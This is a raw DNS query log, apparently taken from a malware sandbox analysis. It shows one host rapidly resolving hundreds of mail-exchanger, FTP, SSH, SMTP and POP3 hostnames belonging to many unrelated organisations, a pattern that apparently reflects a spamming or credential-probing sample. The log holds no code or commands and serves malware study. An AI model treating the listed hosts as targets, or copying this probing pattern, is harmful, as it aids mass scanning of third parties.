                                                                                                                                                                                                    Nov 26, 2023 06:59:30.909343004 CET192.168.2.41.1.1.10x9b8fStandard query (0)saudi-jamac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.909742117 CET192.168.2.41.1.1.10xd907Standard query (0)coimbrausa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.918190002 CET192.168.2.41.1.1.10xf3c1Standard query (0)park-mx.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.918536901 CET192.168.2.41.1.1.10x4c76Standard query (0)mail.lumaruniformes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.919563055 CET192.168.2.41.1.1.10x4b7eStandard query (0)ecolandeck-at0i.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.920073032 CET192.168.2.41.1.1.10xf07Standard query (0)gethsemane-org.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.920588017 CET192.168.2.41.1.1.10xd98aStandard query (0)esoft-academy.mail.eo.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.924910069 CET192.168.2.41.1.1.10x3d5dStandard query (0)ibright-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.925550938 CET192.168.2.41.1.1.10x4aaeStandard query (0)aspmx2.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.925875902 CET192.168.2.41.1.1.10x64a9Standard query (0)gmailvz-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.937670946 CET192.168.2.41.1.1.10x50d0Standard query (0)mail.tradeavenida.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.940598965 CET192.168.2.41.1.1.10x3674Standard query (0)alt2.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.941929102 CET192.168.2.41.1.1.10x37faStandard query (0)mx1.improvmx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.942200899 CET192.168.2.41.1.1.10xe330Standard query (0)mx195.m1bp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.953424931 CET192.168.2.41.1.1.10x4d9Standard query (0)smx00.udag.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.954744101 CET192.168.2.41.1.1.10xd7d0Standard query (0)greenrworld-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.955220938 CET192.168.2.41.1.1.10x1903Standard query (0)alt4.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.955425024 CET192.168.2.41.1.1.10x1735Standard query (0)rechagricola-com-br.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.957370996 CET192.168.2.41.1.1.10x2eaStandard query (0)ALT2.ASPMX.L.GOOGLE.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.957954884 CET192.168.2.41.1.1.10xcebbStandard query (0)mx.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.958278894 CET192.168.2.41.1.1.10xddfeStandard query (0)mx1.supremebox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.097812891 CET192.168.2.41.1.1.10x93fbStandard query (0)utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.099828005 CET192.168.2.41.1.1.10xf420Standard query (0)mail.grantstech.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.136341095 CET192.168.2.41.1.1.10x4a0eStandard query (0)celogic-com0e.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.142333984 CET192.168.2.41.1.1.10xfd0eStandard query (0)upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.142333984 CET192.168.2.41.1.1.10x82abStandard query (0)samsongroup.in.tmes.trendmicro.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.142812014 CET192.168.2.41.1.1.10x2688Standard query (0)mx2.mailserver.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.143589020 CET192.168.2.41.1.1.10x9bb0Standard query (0)chandigarhuniversityazure.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.143822908 CET192.168.2.41.1.1.10x8d79Standard query (0)grg17geblergasse-at.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.149801016 CET192.168.2.41.1.1.10x50ddStandard query (0)engelfirm-com01c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.150657892 CET192.168.2.41.1.1.10xf3abStandard query (0)mx-vip-02.uni5.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.152496099 CET192.168.2.41.1.1.10xd92cStandard query (0)mx1.jimdo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.156940937 CET192.168.2.41.1.1.10x7b04Standard query (0)ms86978078.msv1.invalidA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.161837101 CET192.168.2.41.1.1.10x4884Standard query (0)ceuandalucia-es.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.161837101 CET192.168.2.41.1.1.10xbd3Standard query (0)foundtoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.161837101 CET192.168.2.41.1.1.10x5429Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.166661024 CET192.168.2.41.1.1.10xd2f8Standard query (0)mx.avasin.plus.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.264271021 CET192.168.2.41.1.1.10x4d91Standard query (0)mail.schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.265815020 CET192.168.2.41.1.1.10x4d61Standard query (0)recv1.erinn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.265815020 CET192.168.2.41.1.1.10x3ec4Standard query (0)mail.locandafrancigena.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.265815020 CET192.168.2.41.1.1.10x1593Standard query (0)c47ab644ec7e3f14.mx2.emailprofi.seznam.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.266036034 CET192.168.2.41.1.1.10x33a7Standard query (0)talentius-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.267421961 CET192.168.2.41.1.1.10x8653Standard query (0)my-calvary-qld-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.267421961 CET192.168.2.41.1.1.10x79aeStandard query (0)pop.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.543420076 CET192.168.2.41.1.1.10xa7adStandard query (0)smtpin.rzone.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.543689013 CET192.168.2.41.1.1.10x4a48Standard query (0)mailgate.utlinks.omA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.543836117 CET192.168.2.41.1.1.10x7b82Standard query (0)relay.maxiv.lu.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.567815065 CET192.168.2.41.1.1.10xf96aStandard query (0)www.rechagricola.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.572814941 CET192.168.2.41.1.1.10x163fStandard query (0)mx.core.locaweb.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.610620022 CET192.168.2.41.1.1.10xd3aStandard query (0)ssh.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.611135960 CET192.168.2.41.1.1.10x652fStandard query (0)www.dstaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.634854078 CET192.168.2.41.1.1.10x34c2Standard query (0)smtp.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.636639118 CET192.168.2.41.1.1.10x250fStandard query (0)pop.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.637046099 CET192.168.2.41.1.1.10xe926Standard query (0)mail.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.637046099 CET192.168.2.41.1.1.10xb6f7Standard query (0)pop3.adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.638552904 CET192.168.2.41.1.1.10x82d5Standard query (0)mx.b.locaweb.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.638552904 CET192.168.2.41.1.1.10x469dStandard query (0)smtp.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.638911009 CET192.168.2.41.1.1.10xec28Standard query (0)mailgate.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.639419079 CET192.168.2.41.1.1.10xd0d2Standard query (0)smtp.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.639419079 CET192.168.2.41.1.1.10x5a9aStandard query (0)relay.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.639633894 CET192.168.2.41.1.1.10x4627Standard query (0)mailgate.awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.639880896 CET192.168.2.41.1.1.10x4f05Standard query (0)relay.awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.643155098 CET192.168.2.41.1.1.10x237cStandard query (0)relay.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.661258936 CET192.168.2.41.1.1.10xaa87Standard query (0)relay.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.661467075 CET192.168.2.41.1.1.10xfcb5Standard query (0)imap.gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.662065029 CET192.168.2.41.1.1.10x1900Standard query (0)mailgate.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.784763098 CET192.168.2.41.1.1.10x4152Standard query (0)mydirectlender.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.858552933 CET192.168.2.41.1.1.10xfa51Standard query (0)mail.beachrecruitment.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.858876944 CET192.168.2.41.1.1.10x4faeStandard query (0)www.linkan-group.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.859157085 CET192.168.2.41.1.1.10x7cf8Standard query (0)www.gatewaytoearlylearning.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.861558914 CET192.168.2.41.1.1.10x6b76Standard query (0)getquipu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.861558914 CET192.168.2.41.1.1.10x3b23Standard query (0)upn-pe.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.865173101 CET192.168.2.41.1.1.10x7893Standard query (0)www.perrisesd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.895240068 CET192.168.2.41.1.1.10xa7b8Standard query (0)www.beachrecruitment.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.922301054 CET192.168.2.41.1.1.10xb7a0Standard query (0)www.harasduberry.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.926892996 CET192.168.2.41.1.1.10xb2ccStandard query (0)www.ceuandalucia.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.928982019 CET192.168.2.41.1.1.10xe636Standard query (0)www.grantstech.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.949949026 CET192.168.2.41.1.1.10x2093Standard query (0)www.maxiv.lu.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.969814062 CET192.168.2.41.1.1.10x8c92Standard query (0)www.hugedomains.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.028698921 CET192.168.2.41.1.1.10x4c36Standard query (0)www.prettypollycleaning.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.050386906 CET192.168.2.41.1.1.10x8d79Standard query (0)www.2brospw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.094418049 CET192.168.2.41.1.1.10x41cdStandard query (0)ftp.cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.105905056 CET192.168.2.41.1.1.10x4799Standard query (0)ww38.ondania.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.188091040 CET192.168.2.41.1.1.10xfd0eStandard query (0)upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.190473080 CET192.168.2.41.1.1.10x4edcStandard query (0)kidsrkids.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.193454027 CET192.168.2.41.1.1.10x8a3bStandard query (0)ftp.aoiit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.195760965 CET192.168.2.41.1.1.10x67b0Standard query (0)www.grg17geblergasse.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.234529972 CET192.168.2.41.1.1.10x3a18Standard query (0)pop3.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.500984907 CET192.168.2.41.1.1.10x2c66Standard query (0)ftp.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.504226923 CET192.168.2.41.1.1.10xb50Standard query (0)www.avient.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.625855923 CET192.168.2.41.1.1.10x216cStandard query (0)ftp.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.633387089 CET192.168.2.41.1.1.10xe3f8Standard query (0)mail.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.661544085 CET192.168.2.41.1.1.10x85d5Standard query (0)ssh.gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.768130064 CET192.168.2.41.1.1.10x91f7Standard query (0)relay.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.768131018 CET192.168.2.41.1.1.10xd899Standard query (0)ftp.nohonetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.769485950 CET192.168.2.41.1.1.10xb1deStandard query (0)ftp.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.105252028 CET192.168.2.41.1.1.10xf18dStandard query (0)cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.130682945 CET192.168.2.41.1.1.10x4e72Standard query (0)cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.130683899 CET192.168.2.41.1.1.10x5905Standard query (0)ftp.student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.130893946 CET192.168.2.41.1.1.10xb832Standard query (0)macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.134996891 CET192.168.2.41.1.1.10x1547Standard query (0)ftp.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.136322975 CET192.168.2.41.1.1.10x5943Standard query (0)ftp.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.136754990 CET192.168.2.41.1.1.10x3851Standard query (0)mailgate.adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.138885975 CET192.168.2.41.1.1.10xa158Standard query (0)lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.140614986 CET192.168.2.41.1.1.10x5e75Standard query (0)lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.140882015 CET192.168.2.41.1.1.10x9992Standard query (0)adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.187506914 CET192.168.2.41.1.1.10x506dStandard query (0)ftp.schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.191948891 CET192.168.2.41.1.1.10xc8e0Standard query (0)student.ub.ac.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.202575922 CET192.168.2.41.1.1.10xee0eStandard query (0)gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.202881098 CET192.168.2.41.1.1.10x89dfStandard query (0)carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.203969002 CET192.168.2.41.1.1.10x1161Standard query (0)smtp.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.203969002 CET192.168.2.41.1.1.10xbe28Standard query (0)ftp.macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.206449032 CET192.168.2.41.1.1.10x5167Standard query (0)yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.207484007 CET192.168.2.41.1.1.10xff68Standard query (0)schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.253263950 CET192.168.2.41.1.1.10x1e41Standard query (0)nohonetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.260179043 CET192.168.2.41.1.1.10xa7f8Standard query (0)ftp.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.260943890 CET192.168.2.41.1.1.10xfb42Standard query (0)pixiil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.261260986 CET192.168.2.41.1.1.10x80d8Standard query (0)ftp.pixiil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.261432886 CET192.168.2.41.1.1.10xaf6Standard query (0)ftp.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.293636084 CET192.168.2.41.1.1.10xb6fbStandard query (0)2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.295387030 CET192.168.2.41.1.1.10xe563Standard query (0)ssh.adm.uksw.eduA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.295387030 CET192.168.2.41.1.1.10x247bStandard query (0)sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.298629999 CET192.168.2.41.1.1.10xd2cbStandard query (0)mail.sofia-communications.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.300533056 CET192.168.2.41.1.1.10x1f36Standard query (0)ftp.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.302062988 CET192.168.2.41.1.1.10x181fStandard query (0)mail.lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.302062988 CET192.168.2.41.1.1.10x1548Standard query (0)ftp.cardenas.mtz.rimed.cuA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.325752020 CET192.168.2.41.1.1.10x17b1Standard query (0)paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.326915979 CET192.168.2.41.1.1.10xaa38Standard query (0)mail.paintd.plus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.327210903 CET192.168.2.41.1.1.10x7614Standard query (0)pop3.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.331897974 CET192.168.2.41.1.1.10x1cf9Standard query (0)ftp.gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.332670927 CET192.168.2.41.1.1.10xf8Standard query (0)aoiit.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.344547033 CET192.168.2.41.1.1.10xd28bStandard query (0)ftp.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.391014099 CET192.168.2.41.1.1.10x2b6Standard query (0)ftp.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.391824961 CET192.168.2.41.1.1.10x1229Standard query (0)ftp.member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.392613888 CET192.168.2.41.1.1.10xb71cStandard query (0)ftp.firemailbox.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.392664909 CET192.168.2.41.1.1.10x9de5Standard query (0)ftp.tnav.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.396166086 CET192.168.2.41.1.1.10xd3f9Standard query (0)ftp.elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.402401924 CET192.168.2.41.1.1.10xae9cStandard query (0)ftp.gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.419382095 CET192.168.2.41.1.1.10xefdStandard query (0)ftp.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.423424006 CET192.168.2.41.1.1.10xda21Standard query (0)ftp.pasarjohar.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.426870108 CET192.168.2.41.1.1.10xff26Standard query (0)ftp.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.438627005 CET192.168.2.41.1.1.10xce55Standard query (0)ftp.xegge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.438906908 CET192.168.2.41.1.1.10xaa8Standard query (0)ftp.schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.439557076 CET192.168.2.41.1.1.10xa493Standard query (0)ftp.heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.440269947 CET192.168.2.41.1.1.10xd570Standard query (0)privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.448787928 CET192.168.2.41.1.1.10x65a7Standard query (0)mail.carelesscommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.453680992 CET192.168.2.41.1.1.10x9c3aStandard query (0)ftp.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.454371929 CET192.168.2.41.1.1.10x54bfStandard query (0)mail.yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.457859039 CET192.168.2.41.1.1.10x56cbStandard query (0)ftp.bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.458528042 CET192.168.2.41.1.1.10x438bStandard query (0)mail.2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.470277071 CET192.168.2.41.1.1.10x5015Standard query (0)ftp.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.481523037 CET192.168.2.41.1.1.10x13f5Standard query (0)ftp.chandigarhuniversityazure.onmicrosoft.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.482939959 CET192.168.2.41.1.1.10x54a8Standard query (0)mail.xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.484529018 CET192.168.2.41.1.1.10xc7c5Standard query (0)rech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.704476118 CET192.168.2.41.1.1.10xfae3Standard query (0)ftp.goldenfishcompany.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.717467070 CET192.168.2.41.1.1.10xbf1dStandard query (0)www.knu.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.722949982 CET192.168.2.41.1.1.10x45e5Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.739517927 CET192.168.2.41.1.1.10xfea9Standard query (0)www.bunasta.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.749047041 CET192.168.2.41.1.1.10xb538Standard query (0)mail.y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.750351906 CET192.168.2.41.1.1.10xb88Standard query (0)mail.ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.751966953 CET192.168.2.41.1.1.10x4d7eStandard query (0)mail.gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.752172947 CET192.168.2.41.1.1.10x8971Standard query (0)mail.highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.753062963 CET192.168.2.41.1.1.10x3d13Standard query (0)ftp.healteas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.753397942 CET192.168.2.41.1.1.10xbc83Standard query (0)ftp.matttux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.753493071 CET192.168.2.41.1.1.10x7357Standard query (0)mail.dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.753782988 CET192.168.2.41.1.1.10x30d0Standard query (0)imap.kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.754031897 CET192.168.2.41.1.1.10xd4fdStandard query (0)mail.mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.801793098 CET192.168.2.41.1.1.10x73d6Standard query (0)ftp.5.e9mbw4ghA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.802231073 CET192.168.2.41.1.1.10xa861Standard query (0)ftp.bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.807529926 CET192.168.2.41.1.1.10xbb7fStandard query (0)mail.kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.812458038 CET192.168.2.41.1.1.10x1126Standard query (0)mail.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.827400923 CET192.168.2.41.1.1.10xc711Standard query (0)ssh.lwindowelive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.828819036 CET192.168.2.41.1.1.10xc5aeStandard query (0)ftp.utlinks.omA (IP address)IN (0x0001)false
